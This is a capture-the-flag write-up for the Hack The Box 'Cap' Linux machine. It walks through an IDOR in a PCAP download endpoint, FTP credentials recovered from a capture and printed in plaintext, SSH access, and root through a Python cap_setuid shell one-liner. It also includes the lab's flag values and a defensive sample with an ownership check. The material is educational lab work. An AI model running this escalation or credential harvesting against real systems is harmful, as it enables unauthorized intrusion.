Hack The Box
Cap
Summary
Cap is an Easy Linux machine hosting a network security dashboard. An IDOR
in the capture download feature exposes other users' PCAP files, one of which
contains plaintext FTP credentials. Those credentials grant SSH access, and a
cap_setuid capability set on the Python binary is abused to escalate to
root.
Machine Information
| Name | Difficulty | OS | Platform |
|---|---|---|---|
| Cap | Easy | Linux | Hack The Box |
Attack Path
- Nmap reveals FTP, SSH and HTTP services.
- A web dashboard allows downloading PCAP captures.
- An IDOR exposes other users' capture files.
- PCAP analysis reveals plaintext FTP credentials.
- SSH access is obtained as the user nathan.
- Enumeration finds the Python binary with the cap_setuid capability.
- The capability is abused to escalate to root.
Reconnaissance
Initial service enumeration was performed with Nmap.
sudo nmap -sV -sC -A 10.129.10.156

| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 8.2p1 |
| 80 | HTTP | Gunicorn |
The HTTP service hosted a Security Dashboard web application.
Web Enumeration
The dashboard displayed network traffic statistics and allowed users to download PCAP files of captured traffic.

The download URL used a sequential numeric parameter:
http://10.129.10.156/data/5
Changing the ID to another value exposed other users' captures
(/data/0), confirming an Insecure Direct Object Reference (IDOR).
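As an added illustration (not code from the Cap dashboard or the box), the vulnerable download pattern beside the object-level authorization check that removes the IDOR, written in Python since the application runs under Gunicorn; the capture table, owner names, paths and the audit log are constructed sample data.

```python
from dataclasses import dataclass

# Constructed sample capture store; the real dashboard's schema is unknown.
CAPTURES = {
    0: {"owner": "admin", "path": "/var/captures/0.pcap"},
    5: {"owner": "nathan", "path": "/var/captures/5.pcap"},
}

# Denied requests, kept so that id-walking by one session can be spotted.
AUDIT_LOG = []


@dataclass
class Response:
    status: int
    body: str


def download_vulnerable(session_user: str, capture_id: int) -> Response:
    """IDOR: only the id from the URL is consulted; the logged-in user is
    never compared with the capture's owner, so /data/0 is served to any
    authenticated user."""
    record = CAPTURES.get(capture_id)
    if record is None:
        return Response(404, "not found")
    return Response(200, record["path"])


def download_fixed(session_user: str, capture_id: int) -> Response:
    """Object-level authorization: look the record up, then require that the
    authenticated user owns it before releasing anything. A 404 (not 403)
    is returned so the endpoint does not confirm which ids exist."""
    record = CAPTURES.get(capture_id)
    if record is None or record["owner"] != session_user:
        AUDIT_LOG.append({"user": session_user, "capture_id": capture_id})
        return Response(404, "not found")
    return Response(200, record["path"])


def denied_count(session_user: str) -> int:
    """Number of denied capture requests by a user; a burst of these from a
    single session is the signature of someone walking sequential ids."""
    return sum(1 for entry in AUDIT_LOG if entry["user"] == session_user)
```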
PCAP Analysis
The capture at /data/0 was downloaded and opened in Wireshark. The FTP
traffic inside contained plaintext credentials.

nathan : Buck3tH4TF0RM3!
Initial Access
The recovered credentials were reused to authenticate over SSH as nathan.
ssh nathan@10.129.10.156
This provided the initial foothold on the system.
Privilege Escalation
Enumeration
linPEAS was run to look for escalation vectors and flagged an interesting
capability on the Python binary.
scp linpeas.sh nathan@10.129.10.156:/tmp/

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Abusing cap_setuid
The cap_setuid capability allows the process to change its effective UID, so
Python can be used to set UID 0 and spawn a root shell.
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
This successfully spawned a shell as root.
Flags
User
cat /home/nathan/user.txt

16454aadc23615650b36d19fe560d2cd
Root
cat /root/root.txt

170f052d3f6be9b50f63a47f8d88421b
Vulnerabilities Identified
Insecure Direct Object Reference (IDOR)
- The dashboard served PCAP captures using a sequential ID (/data/5).
- Changing the ID (/data/0) granted access to other users' captures.
Impact: unauthorized access to internal packet captures and disclosure of plaintext credentials.
Insecure Linux Capability (cap_setuid)
- The Python binary had cap_setuid set, allowing any user running it to change UID to 0.
Impact: direct privilege escalation to root.
Tools Used
- Nmap
- Wireshark
- SSH
- linPEAS
- Python
Key Takeaways
- IDOR vulnerabilities can expose sensitive internal data such as packet captures.
- Packet captures frequently contain plaintext credentials.
- Linux capabilities like cap_setuid are a dangerous and often overlooked privesc vector.
- Proper privilege and file-permission management is critical.